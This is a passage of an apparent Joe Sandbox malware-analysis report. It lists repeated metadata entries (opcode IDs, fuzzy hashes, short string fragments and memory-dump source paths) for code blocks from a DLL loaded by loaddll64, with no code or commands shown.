                                                                                                        • Instruction ID: bdb77ffc642b3299673720cbbe7adc6e022f36649dc5c9d605d8e1814f76fd65
                                                                                                        • Opcode Fuzzy Hash: 1aac0f1d3442458b59664808ae9574f9abf7ab878da11c77e58f892187b88b3f
                                                                                                        • Instruction Fuzzy Hash: 28913B30E0061DDBEF69CFA9E8896DDB7B1FB44344F40822DE416A72A1DB74994ACF41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: {?
                                                                                                        • API String ID: 0-3906500937
                                                                                                        • Opcode ID: 2d540e23551ce5f958f4764bec98e9519d494356363efa56796c0522d6c48830
                                                                                                        • Instruction ID: 7643702d073ff4940ecce4f9a509df35797120a70f9b1d87fbff4b68fa84022d
                                                                                                        • Opcode Fuzzy Hash: 2d540e23551ce5f958f4764bec98e9519d494356363efa56796c0522d6c48830
                                                                                                        • Instruction Fuzzy Hash: 90B157B590070DCFEB98CF68C18A9DD3BA9FB15358F404129FC0E96290D7B9E919CB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Rg
                                                                                                        • API String ID: 0-444783058
                                                                                                        • Opcode ID: 062f6907516fb83770376f4ae06b90337ece7bd6ef9ef592e7bb1771c5ef6bb2
                                                                                                        • Instruction ID: de0b65e82f7df1f72d442b51ab019ddee83380224b4c4f084cb2c80ee98f37ca
                                                                                                        • Opcode Fuzzy Hash: 062f6907516fb83770376f4ae06b90337ece7bd6ef9ef592e7bb1771c5ef6bb2
                                                                                                        • Instruction Fuzzy Hash: 9A91087150424D8BEF48CF68C88A6DE3FF0FB18398F255219E84AA6290D778D654CBD9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RC/
                                                                                                        • API String ID: 0-1672839029
                                                                                                        • Opcode ID: cd45515637f1f2b16c20ca83177dd82b64ca54d483ea71e032997c7aebad3db9
                                                                                                        • Instruction ID: 3bbf9db0e9f1f1cd2f3806796f1fd845787a3905c9f06ecb1b9c11751c7e15f2
                                                                                                        • Opcode Fuzzy Hash: cd45515637f1f2b16c20ca83177dd82b64ca54d483ea71e032997c7aebad3db9
                                                                                                        • Instruction Fuzzy Hash: 7291FA7150468DABDBBACF28DC9A7D937A0FB48344F90811AD90E8F290DF745B49DB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: XU
                                                                                                        • API String ID: 0-683303128
                                                                                                        • Opcode ID: e071b3a0d50c9461b57229d15226e783a6e60c7e98d42caa5a907250e51fd640
                                                                                                        • Instruction ID: 425e58cadb221d331942f6c121d336e4e4e9b3bb556196463e5803c943499b9b
                                                                                                        • Opcode Fuzzy Hash: e071b3a0d50c9461b57229d15226e783a6e60c7e98d42caa5a907250e51fd640
                                                                                                        • Instruction Fuzzy Hash: 10613B70D14608DBEB9CDFA4E8896DDBBB1FB48344F10812DE816E72A1DB749A49CF41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: F'K
                                                                                                        • API String ID: 0-2963079709
                                                                                                        • Opcode ID: 713e8163358f3e4ccf3a322240c7036fe92718bea1a19a215dd26039f06aebda
                                                                                                        • Instruction ID: 3cdbfef3d71ad5117e50a41d4a808b16c297a78b625f2c46d5022480677e20ff
                                                                                                        • Opcode Fuzzy Hash: 713e8163358f3e4ccf3a322240c7036fe92718bea1a19a215dd26039f06aebda
                                                                                                        • Instruction Fuzzy Hash: C481A5749043888BDBB9DF68C8897DDBBB0FB48348F20411EDC5AAB291DBB45685CF41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Gh
                                                                                                        • API String ID: 0-277699601
                                                                                                        • Opcode ID: 7940fb094068dd5baf5e4535b0b949c1577390b24490b32456d4c9773adc2951
                                                                                                        • Instruction ID: 49f89991b7669aef05847bf6ac8085ae3f2e5bccc0c70176600d3bb48f89c730
                                                                                                        • Opcode Fuzzy Hash: 7940fb094068dd5baf5e4535b0b949c1577390b24490b32456d4c9773adc2951
                                                                                                        • Instruction Fuzzy Hash: A2512670614B48ABDBC9DE28C4C669D3FE1FB483A8FA06028FC4786295D774D4C5CB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: KdW
                                                                                                        • API String ID: 0-1553299040
                                                                                                        • Opcode ID: 3dbde57a559d0e97d3426f0fe397d2413bb4c768266781bd1ea48c4852796dec
                                                                                                        • Instruction ID: 07466cbb68b99a3b5ba183136cc33729b20d4f14bf8bba25a53fc7287070b877
                                                                                                        • Opcode Fuzzy Hash: 3dbde57a559d0e97d3426f0fe397d2413bb4c768266781bd1ea48c4852796dec
                                                                                                        • Instruction Fuzzy Hash: 17619EB090074A8BDF48CF28C49A59E7FB1FB68398F60421DFC5696290D374DAA5CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 5
                                                                                                        • API String ID: 0-2458008916
                                                                                                        • Opcode ID: 3e00d75dc5af6ed95834cd7e36aa8dd6f7dfadaf5872006e22b3d5cd376261b0
                                                                                                        • Instruction ID: a26923ab85f7e808caed84009aa606e64988cd015e626ed89f9c8f152d3751bb
                                                                                                        • Opcode Fuzzy Hash: 3e00d75dc5af6ed95834cd7e36aa8dd6f7dfadaf5872006e22b3d5cd376261b0
                                                                                                        • Instruction Fuzzy Hash: FD51BEB090074E8BDB48CF64C88B5DE7FB0FB68398F20421DEC5696294D3B496A5CBC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >
                                                                                                        • API String ID: 0-260571596
                                                                                                        • Opcode ID: 52da228a42332ba98b714843feb8a4ffa7a865caa0d47f3da51bcc1adbe3605a
                                                                                                        • Instruction ID: 46fc6c4e0ac0a664899e95d82bf5bf8fb1e46c637e697bbd607199efc3ac47d3
                                                                                                        • Opcode Fuzzy Hash: 52da228a42332ba98b714843feb8a4ffa7a865caa0d47f3da51bcc1adbe3605a
                                                                                                        • Instruction Fuzzy Hash: E351187090070E8FDF48DF68C48A5DE7FB0FB58398F255219E80AA6260C7789695CFC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: e#y
                                                                                                        • API String ID: 0-1553523250
                                                                                                        • Opcode ID: 7cfc1742122b5da270b1305c98699770b0d8300b0d29b437b0f5bbbb71ff1cdb
                                                                                                        • Instruction ID: 8922a9c917ecf92f84784f2c0912e7afb41abd4682f2986cf207ea24a7e27a88
                                                                                                        • Opcode Fuzzy Hash: 7cfc1742122b5da270b1305c98699770b0d8300b0d29b437b0f5bbbb71ff1cdb
                                                                                                        • Instruction Fuzzy Hash: 4451C0B090034A8BDB48DF24C49A4DE7FB1BB68394F60461DEC56AA290D37896A5CBC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ;Qe+
                                                                                                        • API String ID: 0-3743842969
                                                                                                        • Opcode ID: abc73cde212dc252b0e5d03e266be842b85d1299fa2b3d615a0caa319cbc98b6
                                                                                                        • Instruction ID: 2891cc472bdff435687e8dc78c7f584053815dc88c3a0ad3e69441950bb252b7
                                                                                                        • Opcode Fuzzy Hash: abc73cde212dc252b0e5d03e266be842b85d1299fa2b3d615a0caa319cbc98b6
                                                                                                        • Instruction Fuzzy Hash: FB51B3B190074A8BDB48CF68C49A5DE7FB0BB68398F114229EC5696250D374DAA5CBC0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,'
                                                                                                        • API String ID: 0-3722628154
                                                                                                        • Opcode ID: fb5c24a2de7b785ef7d1522db3a7cd1fc0c6d32909dcdfd4e7ef4007326c169e
                                                                                                        • Instruction ID: 8bcc0ae8ca8a44d8cc4a64df71be4da37ed53fd059e3607e1506b6ed9a83d4bd
                                                                                                        • Opcode Fuzzy Hash: fb5c24a2de7b785ef7d1522db3a7cd1fc0c6d32909dcdfd4e7ef4007326c169e
                                                                                                        • Instruction Fuzzy Hash: 9C51E3B091074A8FDB48CF68C9865DE7FB0FB68394F10421DEC5AA6290D37496A5CFC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ;qct
                                                                                                        • API String ID: 0-1256533914
                                                                                                        • Opcode ID: 7e5896647748426d00c93f1e327efcd977346de81977c4c15da4b7b9c787c365
                                                                                                        • Instruction ID: 5c1d59b2199d0d85db2571b197c7ca3ede17e59358e5629c23b069c973ffe58b
                                                                                                        • Opcode Fuzzy Hash: 7e5896647748426d00c93f1e327efcd977346de81977c4c15da4b7b9c787c365
                                                                                                        • Instruction Fuzzy Hash: B741E27051078D8BDB49CF68C88A4DE7BA0FB4835CF155619FC8AA6260D3B8D585CF89
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %[
                                                                                                        • API String ID: 0-3862537531
                                                                                                        • Opcode ID: f1dc08e8e3e3301475fb70ff4cfa84bb86d735aa649ff25d3a10773117e6cde7
                                                                                                        • Instruction ID: 6a4ad4b0db03769040014b30bff45f2a66b5b8118bf8a9f7d20fa3eb207c29ac
                                                                                                        • Opcode Fuzzy Hash: f1dc08e8e3e3301475fb70ff4cfa84bb86d735aa649ff25d3a10773117e6cde7
                                                                                                        • Instruction Fuzzy Hash: 6E31D6B150478A8BDB4CDF68D8565AE3BB1FB48304F004A2DFD26DB390D7B49624CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Wn
                                                                                                        • API String ID: 0-506041651
                                                                                                        • Opcode ID: 571cac09fbe3685261a59c499fbd8c80fdf8cf6d47964e918e1805a2c447958a
                                                                                                        • Instruction ID: 81acd842a4d7b99bb8f16045e05b91d2bb3390d65dcb5750e05b0634c9df5c42
                                                                                                        • Opcode Fuzzy Hash: 571cac09fbe3685261a59c499fbd8c80fdf8cf6d47964e918e1805a2c447958a
                                                                                                        • Instruction Fuzzy Hash: 5F41D4B050078A8FDF48CF68D89A5DE7BB1FB48348F104A2CEC6696290D3B4D664CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "p
                                                                                                        • API String ID: 0-3060671971
                                                                                                        • Opcode ID: ae29b2ab0911a73132ecede333d1ad00ec6016c3b77c06c2e3197b8238caa4ac
                                                                                                        • Instruction ID: 6d64e93883db61d95f36b7a5a375b7ada03e85890cb65b9286afd9a0e7997e4a
                                                                                                        • Opcode Fuzzy Hash: ae29b2ab0911a73132ecede333d1ad00ec6016c3b77c06c2e3197b8238caa4ac
                                                                                                        • Instruction Fuzzy Hash: 42317EB190438E8FDB48DF68D85A5AE3BA0FB48344F014A1DEC269B354D7B4D664CBD4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 3k^)
                                                                                                        • API String ID: 0-3788653604
                                                                                                        • Opcode ID: bb4a256fcbfa579ec56a1ee2ed7beb19ee26f98eb9724182ed08b84c2a93462e
                                                                                                        • Instruction ID: 9f8dcddef577f6809e8fc1cb2f7e992fa0b5e1cd21e70ff7818dd4bfba9124f9
                                                                                                        • Opcode Fuzzy Hash: bb4a256fcbfa579ec56a1ee2ed7beb19ee26f98eb9724182ed08b84c2a93462e
                                                                                                        • Instruction Fuzzy Hash: B7417FB090474E8BDB44CF64C48A5CE7FB0FB68398F200619F859A6250D3B8D6A5CBD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: L>
                                                                                                        • API String ID: 0-3698593629
                                                                                                        • Opcode ID: 4505467bed29688f524a608710bc2007b6739dbdf074f8a934cd9a0936b0c64f
                                                                                                        • Instruction ID: d89d460aa873d83448a17f0a74045e6cf2e1d6238d53f49acea812bb04bd12ae
                                                                                                        • Opcode Fuzzy Hash: 4505467bed29688f524a608710bc2007b6739dbdf074f8a934cd9a0936b0c64f
                                                                                                        • Instruction Fuzzy Hash: C23193716183818BD748DF28D45652ABBE1FB8D30CF504B2DF8CAA7255D738D605CB4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4s
                                                                                                        • API String ID: 0-872399246
                                                                                                        • Opcode ID: 6d87eca2fd37755a10645a04d53ddd8ccaa51cb07cf26575bdb0066d7b11df8f
                                                                                                        • Instruction ID: eeb76c7ae662c84e9fd1594776157fcd1e0c77f05a4f9c485f3ea2b2cc7d31c8
                                                                                                        • Opcode Fuzzy Hash: 6d87eca2fd37755a10645a04d53ddd8ccaa51cb07cf26575bdb0066d7b11df8f
                                                                                                        • Instruction Fuzzy Hash: 314181B090474A8FDB48CF64D48A5DF7FB0FB68398F200519E859A62A0D378D6A4CFC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: &'
                                                                                                        • API String ID: 0-655172784
                                                                                                        • Opcode ID: 350a21f38a3fdb5f3133185a05ab1b6e8489f4d150297426f8e9146ad85da26a
                                                                                                        • Instruction ID: e60b1eca4cd057e5464165fc71d6e00ca11e6494182570a2c7a3ee484fb5e5db
                                                                                                        • Opcode Fuzzy Hash: 350a21f38a3fdb5f3133185a05ab1b6e8489f4d150297426f8e9146ad85da26a
                                                                                                        • Instruction Fuzzy Hash: DE3179755083818BD348DF28C55641ABBE1BBCC35CF805B2DE4CAAB3A4D778D605CB4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `
                                                                                                        • API String ID: 0-1850852036
                                                                                                        • Opcode ID: 1919c1110502d15319449504d6e91b7fa88324414ab81abcf7b1c29e64ecc28d
                                                                                                        • Instruction ID: 12f27fef96dc8894754dd231533b976fb372cf9f09be1d3cddb09b50d4677c93
                                                                                                        • Opcode Fuzzy Hash: 1919c1110502d15319449504d6e91b7fa88324414ab81abcf7b1c29e64ecc28d
                                                                                                        • Instruction Fuzzy Hash: 2221267065DB449FE388DF29C48961BBAE1FBD8340F905A1EF885C2360C734D845CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BsL
                                                                                                        • API String ID: 0-590970710
                                                                                                        • Opcode ID: 4c7ca18370d47a9c2cceab002f43e00c4595808ca112b21f17e8f3d7773031d4
                                                                                                        • Instruction ID: bf3e705d0a3e127a6b239d821588e89859f67f6db20862a07d3c8d6d25b0e04a
                                                                                                        • Opcode Fuzzy Hash: 4c7ca18370d47a9c2cceab002f43e00c4595808ca112b21f17e8f3d7773031d4
                                                                                                        • Instruction Fuzzy Hash: 41317DB1529780AFD3C8DF28C48691BBBE0FB89314F816A2DF9C586260D374D455CF02
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ZR
                                                                                                        • API String ID: 0-4130514108
                                                                                                        • Opcode ID: 6cbb8a842fd3cc15b819203d482a3a3b46369313eab12406f6265ee7f7ea0382
                                                                                                        • Instruction ID: b13af9977396cc860318babd94d7947ade869d3bdb5f1587fd609083ec60b6d4
                                                                                                        • Opcode Fuzzy Hash: 6cbb8a842fd3cc15b819203d482a3a3b46369313eab12406f6265ee7f7ea0382
                                                                                                        • Instruction Fuzzy Hash: 0B316EB052D780AFD388DF28C49691ABBE1FBC5315F806A1DF9968B350D774D445CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %F
                                                                                                        • API String ID: 0-915744445
                                                                                                        • Opcode ID: cf4e8b82da0d821891615694ed2d7715b09984878493b04af082e458cdddcb63
                                                                                                        • Instruction ID: f3632c01bd7492b9d648e83c8b8289f5be8476ad9f7b0aa526bfe9f17a615d29
                                                                                                        • Opcode Fuzzy Hash: cf4e8b82da0d821891615694ed2d7715b09984878493b04af082e458cdddcb63
                                                                                                        • Instruction Fuzzy Hash: A1317AB15087809BD348DF28D44A45ABBE1BB9C31CF414B1DF4CAAB254D3B9D608CF0A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >
                                                                                                        • API String ID: 0-1166260821
                                                                                                        • Opcode ID: 7fdb2c55224cd27c72bb618ee64ca03bed07baaed02b8a8707ebf8ca8fbe557d
                                                                                                        • Instruction ID: a3d582c264d7a48cbd0e974e941d71c0af5034fa157bb054186120ff964f1b5c
                                                                                                        • Opcode Fuzzy Hash: 7fdb2c55224cd27c72bb618ee64ca03bed07baaed02b8a8707ebf8ca8fbe557d
                                                                                                        • Instruction Fuzzy Hash: 4F316BB55083808FD788DF28D45941ABBE0BB9C358F404B2DF4CAA72A1D778DA45CF0A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -
                                                                                                        • API String ID: 0-524432557
                                                                                                        • Opcode ID: ab6574b7591fa644ef4a174e0089e3a7f2dde0b4bdacdeb17973816cbe5b2230
                                                                                                        • Instruction ID: 2743ae798d84361f3c47c0844efe4056bc1e573d44da25ce9fa5af028cbcbbd6
                                                                                                        • Opcode Fuzzy Hash: ab6574b7591fa644ef4a174e0089e3a7f2dde0b4bdacdeb17973816cbe5b2230
                                                                                                        • Instruction Fuzzy Hash: E22160B152D780AFD388DF29D18991BBBE0BB85344F806E1DF8C68B250D7B5D845CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 9D
                                                                                                        • API String ID: 0-1055660748
                                                                                                        • Opcode ID: 7e3a213964b2efcfd3778a88dd8b399f98e251b5205d52f3c39e35f889fd4133
                                                                                                        • Instruction ID: 2b980fabc4745c60efad4018d3cdf33bc582eba9e1b676cceb4e0857b73aa84d
                                                                                                        • Opcode Fuzzy Hash: 7e3a213964b2efcfd3778a88dd8b399f98e251b5205d52f3c39e35f889fd4133
                                                                                                        • Instruction Fuzzy Hash: 6C2179B450C3858BD348DF28D14A51ABBE0BB9C70CF400B5DF8CAAB254D778D644CB0A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ]i
                                                                                                        • API String ID: 0-2057496602
                                                                                                        • Opcode ID: 986d758f6ca8ef85e847a0378ae5df520f089d8d24386f824cd21791a7bd6731
                                                                                                        • Instruction ID: 4a116e0a0ac8943674a44645b40dd0a83197eee35043817acb7aa81aadce2f0a
                                                                                                        • Opcode Fuzzy Hash: 986d758f6ca8ef85e847a0378ae5df520f089d8d24386f824cd21791a7bd6731
                                                                                                        • Instruction Fuzzy Hash: 492154B45087858BD398DF28D48A50AFBE0BB9C318F400B1DF4C9A62A4D77DDA45CB0A
                                                                                                        Uniqueness

